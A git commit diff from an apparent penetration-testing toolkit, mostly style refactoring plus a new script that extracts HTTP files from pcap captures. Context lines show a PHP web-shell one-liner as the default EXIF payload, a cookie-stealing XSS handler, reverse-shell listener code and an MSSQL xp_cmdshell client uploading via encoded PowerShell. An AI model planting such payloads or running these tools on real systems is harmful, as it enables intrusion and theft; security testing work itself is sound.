This commit is contained in:
Roman Hergenreder 2022-12-09 14:54:06 +01:00
parent 80abe85b85
commit da8dee2143
10 changed files with 410 additions and 30 deletions

@ -2,7 +2,7 @@ import os
import sys
__doc__ = __doc__ or ""
__all__ = ["util","fileserver","xss_handler","rev_shell","xp_cmdshell", "dnsserver"]
__all__ = ["util", "fileserver", "xss_handler", "rev_shell", "xp_cmdshell", "dnsserver"]
inc_dir = os.path.dirname(os.path.realpath(__file__))
sys.path.append(inc_dir)

@ -10,6 +10,7 @@ from bs4 import BeautifulSoup
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class Crawler:
def __init__(self, url):
@ -36,8 +37,8 @@ class Crawler:
self.pages = set()
def request(self, url):
headers = { "User-Agent": self.user_agent }
kwargs = { "verify": False, "cookies": self.cookies, "headers": headers }
headers = {"User-Agent": self.user_agent}
kwargs = {"verify": False, "cookies": self.cookies, "headers": headers}
if self.proxy:
kwargs["proxy"] = {
"http": self.proxy,
@ -67,24 +68,25 @@ class Crawler:
if parts.netloc and parts.netloc != self.domain:
self.out_of_scope.add(url)
else:
resources_ext = ["jpg", "jpeg", "gif", "png", "css", "js","svg","ico"]
resources_ext = ["jpg", "jpeg", "gif", "png", "css", "js", "svg", "ico"]
path, args = parts.path, None
if "?" in path:
path = path[0:path.index("?")]
args = urllib.parse.parse_args(path[path.index("?")+1:])
args = urllib.parse.parse_args(path[path.index("?") + 1:])
if path.rsplit(".", 1)[-1] in resources_ext:
self.resources.add(url)
else:
self.pages.add(url)
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme,fragment="").geturl())
self.queue.put(parts._replace(netloc=self.domain, scheme=self.scheme, fragment="").geturl())
def collect_urls(self, page):
@staticmethod
def collect_urls(page):
if not isinstance(page, BeautifulSoup):
page = BeautifulSoup(page, "html.parser")
urls = set()
attrs = ["src","href","action"]
tags = ["a","link","script","img","form"]
attrs = ["src", "href", "action"]
tags = ["a", "link", "script", "img", "form"]
for tag in tags:
for e in page.find_all(tag):
@ -98,7 +100,7 @@ class Crawler:
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("url", help="The target URI to scan to, e.g. http://example.com:8080/dir/")
parser.add_argument("--proxy", help="Proxy to connect through") # TODO
parser.add_argument("--proxy", help="Proxy to connect through") # TODO
parser.add_argument("--user-agent", help="User-Agent to use")
parser.add_argument("--cookie", help="Cookies to send", action='append', default=[])
parser.add_argument('--verbose', '-v', help="Verbose otuput", action='store_true')
@ -109,7 +111,7 @@ if __name__ == "__main__":
if args.user_agent:
crawler.user_agent = args.user_agent
if args.proxy:
crawler.proxy = proxy
crawler.proxy = args.proxy
cookie_pattern = re.compile("^([a-zA-Z0-9.%/+_-]+)=([a-zA-Z0-9.%/+_-])*$")
for cookie in crawler.cookies:
@ -118,7 +120,7 @@ if __name__ == "__main__":
print("[-] Cookie does not match pattern:", cookie)
print("[-] You might need to URL-encode it")
exit()
key, value = (urllib.parse.unquoute(m[1]),urllib.parse.unquoute(m[2]))
key, value = (urllib.parse.unquoute(m[1]), urllib.parse.unquoute(m[2]))
crawler.cookies[key] = value
crawler.start()

@ -272,7 +272,7 @@ if __name__ == "__main__":
httpPort = 80
fileServer = HttpFileServer("0.0.0.0", httpPort)
ipAddress = util.getAddress()
ipAddress = util.get_address()
if sys.argv[1] == "shell":
listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])

321
pcap-file-extract.py Normal file

@ -0,0 +1,321 @@
import argparse
import os
import re
from abc import ABC, abstractmethod
from scapy.all import *
from hackingscripts import util
class HttpPacket(ABC):
def __init__(self, version):
self.version = version
self.headers = util.CaseInsensitiveDict()
self.payload = None
@staticmethod
def parse(data):
index = data.index(b"\r\n")
first_line = data[0:index+2].decode()
matches_req = re.match(HttpRequest.PATTERN.decode(), first_line)
matches_res = re.match(HttpResponse.PATTERN.decode(), first_line)
if matches_req:
http_packet = HttpRequest(*matches_req.groups())
elif matches_res:
http_packet = HttpResponse(*matches_res.groups())
else:
return None
header_end = data.index(b"\r\n\r\n")
header_buffer = data[index+2:header_end+2].decode()
http_packet.payload = data[header_end+4:]
for line in re.findall("([^:]+):\s?(.*)\r\n", header_buffer):
http_packet.headers[line[0]] = line[1]
return http_packet
@abstractmethod
def get_file_path(self):
pass
class HttpRequest(HttpPacket):
PATTERN = b"([A-Z]+) ([^ ]+) HTTP/([0-9.]+)\r\n"
def __init__(self, method, uri, version):
super().__init__(version)
self.method = method
self.uri = uri
def __repr__(self):
return f"{self.method} {self.uri} HTTP/{self.version}, payload=" + util.human_readable_size(len(self.payload))
def get_file_path(self):
return self.uri
class HttpResponse(HttpPacket):
PATTERN = b"HTTP/([0-9.]+) ([0-9]+) (.*)\r\n"
def __init__(self, version, status_code, status_text):
super().__init__(version)
self.status_code = int(status_code)
self.status_text = status_text
self.response_to = None
def get_file_path(self):
content_disposition = self.headers.get("Content-Disposition", None)
if content_disposition:
matches = re.findall(";\s*filename=\"?(.*)\"?(;|$)", content_disposition)
if matches:
return matches[0][0]
if self.response_to:
return self.response_to.get_file_path()
return None
def __repr__(self):
return f"HTTP/{self.version} {self.status_code} {self.status_text}, payload=" + util.human_readable_size(len(self.payload))
class PacketIterator:
def __init__(self, connection):
self.connection = connection
self.index = 0
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.has_more():
packet = self.connection.packets[self.index]
self.index += 1
return packet
else:
raise StopIteration
def peek(self):
return None if not self.has_more() else self.connection.packets[self.index]
def pop(self):
packet = self.peek()
if packet:
self.index += 1
return packet
def find_packet(self, pattern, sock_src=None):
for packet in self.connection.packets[self.index:]:
self.index += 1
tcp_packet = packet[TCP]
ip_hdr = packet[IP]
packet_src = f"{ip_hdr.src}:{tcp_packet.sport}"
if sock_src is not None and packet_src != sock_src:
continue
payload = bytes(tcp_packet.payload)
match = re.findall(pattern, payload)
if match:
return packet, match[0], packet_src
return None
def has_more(self):
return self.index < len(self.connection.packets)
class TcpConnection:
def __init__(self, sock_a, sock_b):
self.sock_a = sock_a
self.sock_b = sock_b
self.packets = []
self._payload_size = 0
def add_packet(self, packet):
self.packets.append(packet)
self._payload_size += len(packet[TCP].payload)
def get_key(self):
return TcpConnections._format_key(self.sock_a, self.sock_b)
def iterator(self):
return PacketIterator(self)
def get_other_sock(self, sock):
return self.sock_a if sock == self.sock_b else self.sock_b
def __repr__(self):
return f"{self.get_key()}: {len(self.packets)} packets, {util.human_readable_size(self._payload_size)}"
class TcpConnections:
def __init__(self):
self.connections = {}
def __contains__(self, item: TcpConnection):
return str(item) in self.connections
def add(self, element: TcpConnection):
self.connections[str(element)] = element
def __getitem__(self, item: TcpConnection):
return self.connections[str(item)]
def __iter__(self):
return iter(self.connections.values())
@staticmethod
def _format_key(sock_a, sock_b):
return f"{sock_a}<->{sock_b}" if sock_a < sock_b else f"{sock_b}<->{sock_a}"
def get_connection(self, sock_a, sock_b):
key = self._format_key(sock_a, sock_b)
return self.connections[key]
def add_packet(self, sock_src, sock_dst, packet):
key = self._format_key(sock_src, sock_dst)
if key not in self.connections:
self.connections[key] = TcpConnection(sock_src, sock_dst)
self.connections[key].add_packet(packet)
return self.connections[key]
class PcapExtractor:
def __init__(self, pcap_path, output_dir="extracted_files/", filters=None):
self.pcap_path = pcap_path
self.output_dir = output_dir
self.filters = filters if filters is not None else []
self._packets = None
def _open_file(self):
# self._packets = pcapkit.extract(fin=self.pcap_path, store=False, nofile=True)
self._packets = rdpcap(self.pcap_path)
def extract_all(self):
pass
def _apply_filters(self, packets):
filtered_packets = packets
for f in self.filters:
filtered_packets = filter(f, filtered_packets)
return list(filtered_packets)
def list(self):
self._open_file()
http_packets = self._parse_http_packets()
filtered_packets = self._apply_filters(http_packets)
for packet in filtered_packets:
print(packet)
def get_http_packet(self, packet_iterator, sock_src, initial_packet):
http_buffer = bytes(initial_packet[TCP].payload)
while packet_iterator.has_more():
next_packet = packet_iterator.peek()
if sock_src == f"{next_packet[IP].src}:{next_packet[TCP].sport}":
next_packet = packet_iterator.pop()
http_buffer += bytes(next_packet[TCP].payload)
else:
break
return HttpPacket.parse(http_buffer)
def _parse_http_packets(self):
connections = TcpConnections()
for packet in self._packets:
if TCP not in packet:
continue
ip_hdr = packet[IP]
tcp_packet = packet[TCP]
if len(tcp_packet.payload) == 0:
continue
sock_src = f"{ip_hdr.src}:{tcp_packet.sport}"
sock_dst = f"{ip_hdr.dst}:{tcp_packet.dport}"
connections.add_packet(sock_src, sock_dst, packet)
http_packets = []
for connection in connections:
packet_iterator = connection.iterator()
while packet_iterator.has_more():
request = packet_iterator.find_packet(HttpRequest.PATTERN)
if not request:
continue
packet, match, sock_src = request
method = match[0].decode()
file_name = match[1].decode().rsplit("?")[0]
http_request_packet = self.get_http_packet(packet_iterator, sock_src, packet)
http_packets.append(http_request_packet)
other_sock = connection.get_other_sock(sock_src)
response = packet_iterator.find_packet(HttpResponse.PATTERN, sock_src=other_sock)
if not response:
continue
packet, match, sock_src = response
status_code = match[1].decode()
http_response_packet = self.get_http_packet(packet_iterator, sock_src, packet)
http_response_packet.response_to = http_request_packet
http_packets.append(http_response_packet)
return http_packets
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to pcap file to extract files from")
parser.add_argument("-o", "--output-dir", help="Path to destination directory", default="extracted_files/",
dest="output_dir")
parser.add_argument("-l", "--list", help="List available files only", default=False, action="store_true")
parser.add_argument("-e", "--extract", help="Extract files (default)", default=None, action="store_true")
parser.add_argument("-ec", "--exclude-codes", help="Exclude http status codes, default: 101,304,403,404",
default="101,304,403,404", dest="exclude_codes")
parser.add_argument("-ic", "--include-codes", help="Limit http status codes", type=str,
default="", dest="include_codes")
parser.add_argument("-fe", "--file-extensions", help="File extensions, e.g. txt,exe,pdf", type=str,
default="", dest="file_extensions")
parser.add_argument("-fn", "--file-name", help="File name, e.g. passwords.txt", type=str,
default="", dest="file_name")
parser.add_argument("-fp", "--file-path", help="File path (uri), e.g. /admin/index.html", type=str,
default="", dest="file_path")
# TODO: ports, ip_addresses...
args = parser.parse_args()
filters = [
lambda p: not isinstance(p, HttpResponse) or p.status_code not in [int(x) for x in args.exclude_codes.split(",")],
]
if args.include_codes:
filters.append(lambda p: not isinstance(p, HttpResponse) or p.status_code in [int(x) for x in args.include_codes.split(",")])
if args.file_extensions:
filters.append(lambda p: os.path.splitext(p.file_name)[1] in args.file_extensions.split(","))
if args.file_name:
filters.append(lambda p: os.path.basename(p.get_file_path()) == args.file_name)
if args.file_path:
filters.append(lambda p: p.get_file_path() == args.file_path)
pcap_path = args.file
if not os.path.isfile(pcap_path):
print("[-] File not found or not a file:", pcap_path)
exit(1)
output_dir = args.output_dir
if not os.path.isdir(output_dir):
os.makedirs(output_dir, exist_ok=True)
if not os.path.isdir(output_dir):
print("[-] Output directory is not a directory or does not exist and could not be created:", output_dir)
exit(2)
pcap_extractor = PcapExtractor(pcap_path, output_dir, filters)
if args.list and args.extract:
print("[-] Can only specify one of list or extract, not both")
exit(3)
elif args.list:
pcap_extractor.list()
else:
pcap_extractor.extract_all()

@ -1,7 +1,6 @@
#!/usr/bin/python
import sys
import os
import ipaddress
import subprocess

@ -12,3 +12,4 @@ pwntools==4.7.0
requests==2.23.0
SocksiPy_branch==1.01
urllib3==1.25.11
scapy==2.5.0rc2

@ -12,7 +12,7 @@ if len(sys.argv) < 2:
FILENAME = sys.argv[1]
# Bind the socket to the port or choose a random one
address = util.getAddress()
address = util.get_address()
port = None if len(sys.argv) < 3 else int(sys.argv[2])
sock = util.openServer(address, port)
if not sock:

56
util.py

@ -3,13 +3,11 @@
import random
import socket
import netifaces as ni
import requests
import sys
import exif
import os
import io
from PIL import Image
from bs4 import BeautifulSoup
def isPortInUse(port):
import socket
@ -154,6 +152,60 @@ def set_exif_data(payload="<?php system($_GET['c']);?>", _in=None, _out=None, ex
print("Invalid output argument.")
def human_readable_size(value):
index = 0
suffixes = ["B", "KiB", "MiB", "GiB", "TiB"]
while value >= 1024:
if index >= len(suffixes) - 1:
break
value /= 1024.0
index += 1
return "%.2f %s" % (value, suffixes[index])
class CaseInsensitiveDict(dict):
"""Basic case-insensitive dict with strings only keys."""
proxy = {}
def __init__(self, data=None):
super().__init__()
if data:
self.proxy = dict((k.lower(), k) for k in data)
for k in data:
self[k] = data[k]
else:
self.proxy = dict()
def __contains__(self, k):
return k.lower() in self.proxy
def __delitem__(self, k):
key = self.proxy[k.lower()]
super(CaseInsensitiveDict, self).__delitem__(key)
del self.proxy[k.lower()]
def __getitem__(self, k):
key = self.proxy[k.lower()]
return super(CaseInsensitiveDict, self).__getitem__(key)
def get(self, k, default=None):
return self[k] if k in self else default
def __setitem__(self, k, v):
super(CaseInsensitiveDict, self).__setitem__(k, v)
self.proxy[k.lower()] = k
@staticmethod
def build(labels, data):
row = CaseInsensitiveDict()
for key, val in zip(labels, data):
row[key] = val
return row
if __name__ == "__main__":
bin = sys.argv[0]
if len(sys.argv) < 2:

@ -2,10 +2,11 @@
# interactive xp_cmdshell
# with impacket and cmd
# used https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py for reference
import os, cmd, sys, re, base64
import base64
import cmd
from impacket import tds
import readline
import argparse
class XpShell(cmd.Cmd):
@ -16,10 +17,12 @@ class XpShell(cmd.Cmd):
self.file = None
self.pwsh = False
def powershell_encode(self, data):
@staticmethod
def powershell_encode(data):
return base64.b64encode(data.encode('UTF-16LE')).decode()
def powershell_encode_binary(self, data):
@staticmethod
def powershell_encode_binary(data):
return base64.b64encode(data).decode()
# interpret every line as system command
@ -57,11 +60,11 @@ exit - i wont say what it does
def do_upload(self, data, dest):
writeme = bytearray() # contains bytes to be written
cmd = 'New-Item -Path {} -Force'.format(dest)
cmd = self.powershell_encode(cmd)
try:
# create/overwrite the target file with powershell
cmd = 'New-Item -Path {} -Force'.format(dest)
cmd = self.powershell_encode(cmd)
self.execute_query('powershell -encodedCommand {}'.format(cmd))
except FileNotFoundError as e:
print('File not found.')
@ -141,6 +144,7 @@ exit - i wont say what it does
except ConnectionResetError as e:
self.reconnect_mssql()
def connect_mssql(ip, port=1433, username="sa", password="", domain=""):
# do database connection (simple for now)
ms_sql = tds.MSSQL(ip, port)
@ -152,6 +156,7 @@ def connect_mssql(ip, port=1433, username="sa", password="", domain=""):
else:
return res
if __name__ == '__main__':
# pass commands directly into powershell
# ./xp_cmdshell.py -powershell

@ -48,7 +48,7 @@ class XssServer(BaseHTTPRequestHandler):
def do_GET(self):
self._set_headers()
if self.path == "/xss":
cookie_addr = getCookieAddress(util.getAddress(), listen_port)
cookie_addr = getCookieAddress(util.get_address(), listen_port)
self.wfile.write(cookie_addr.encode())
else:
self.wfile.write(self._html())
@ -84,7 +84,7 @@ if __name__ == "__main__":
listen_port = None if len(sys.argv) < 3 else int(sys.argv[2])
payload_type = sys.argv[1].lower()
local_address = util.getAddress()
local_address = util.get_address()
# choose random port
if listen_port is None: